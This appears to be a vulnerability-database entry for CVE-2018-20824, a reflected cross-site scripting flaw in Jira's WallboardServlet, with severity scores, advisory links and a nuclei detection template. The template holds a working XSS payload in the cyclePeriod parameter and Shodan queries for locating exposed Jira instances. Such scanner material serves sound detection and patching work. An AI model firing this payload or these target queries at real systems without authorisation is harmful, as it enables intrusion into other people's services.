Atlassian Jira WallboardServlet <7.13.1 - Cross-Site Scripting

🗓️ 22 Jun 2026 05:20:07Reported by ProjectDiscoveryType

Atlassian Jira WallboardServlet <7.13.1 - Cross-Site Scripting allows remote attackers to inject arbitrary HTML or JavaScript via a cross-site scripting vulnerability in the cyclePeriod parameter. Upgrade to Atlassian Jira version 7.13.1 or later to mitigate this vulnerability

Reporter	Title	Published	Views	Family All 11
Atlassian	XSS in WallboardServlet through the cyclePeriod parameter - CVE-2018-20824	29 Apr 201903:14	–	atlassian
Atlassian	XSS in WallboardServlet through the cyclePeriod parameter - CVE-2018-20824	29 Apr 201903:14	–	atlassian
Circl	CVE-2018-20824	18 Mar 202407:23	–	circl
CVE	CVE-2018-20824	3 May 201919:26	–	cve
Cvelist	CVE-2018-20824	3 May 201919:26	–	cvelist
Tenable Nessus	Atlassian JIRA 7.7.x < 7.13.1 XSS vulnerability (JRASERVER-69238)	25 Sep 201900:00	–	nessus
Tenable Nessus	Atlassian Jira 7.7.x < 7.13.1 Cross-Site Scripting	27 Oct 202000:00	–	nessus
NVD	CVE-2018-20824	3 May 201920:29	–	nvd
Openbugbounty	punjabemunicipalityissues.lgpunjab.gov.in Cross Site Scripting vulnerability OBB-2038732	5 Jun 202105:48	–	openbugbounty
OSV	CVE-2018-20824	3 May 201920:29	–	osv

Source	Link
jira	www.jira.atlassian.com/browse/JRASERVER-69238
nvd	www.nvd.nist.gov/vuln/detail/CVE-2018-20824
github	www.github.com/ARPSyndicate/kenzer-templates
github	www.github.com/UGF0aWVudF9aZXJv/Atlassian-Jira-pentesting
github	www.github.com/merlinepedra25/nuclei-templates

id: CVE-2018-20824

info:
  name: Atlassian Jira WallboardServlet <7.13.1 - Cross-Site Scripting
  author: madrobot,dwisiswant0
  severity: medium
  description: The WallboardServlet resource in Jira before version 7.13.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross-site scripting vulnerability in the cyclePeriod parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade to Atlassian Jira version 7.13.1 or later to mitigate this vulnerability.
  reference:
    - https://jira.atlassian.com/browse/JRASERVER-69238
    - https://nvd.nist.gov/vuln/detail/CVE-2018-20824
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/UGF0aWVudF9aZXJv/Atlassian-Jira-pentesting
    - https://github.com/merlinepedra25/nuclei-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2018-20824
    cwe-id: CWE-79
    epss-score: 0.37577
    epss-percentile: 0.98342
    cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: atlassian
    product: jira
    shodan-query:
      - http.component:"Atlassian Jira"
      - http.component:"atlassian jira"
      - http.component:"atlassian confluence"
      - cpe:"cpe:2.3:a:atlassian:jira"
  tags: cve2018,cve,atlassian,jira,xss,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - (?mi)timeout:\salert\(document\.domain\)

      - type: status
        status:
          - 200
# digest: 490a0046304402207fa76dca1c78c6824ead87ddd672f463750c4f113f4580a4b07d5177da0477b902207764cef51b683145cb2b7b75c2850e1b35bfced911a6e728ded03fa1191fec18:922c64590222798bb761d5b6d8e72950

04 Feb 2026 07:00Current

6.5Medium risk

Vulners AI Score6.5

CVSS 24.3

CVSS 36.1

EPSS0.37577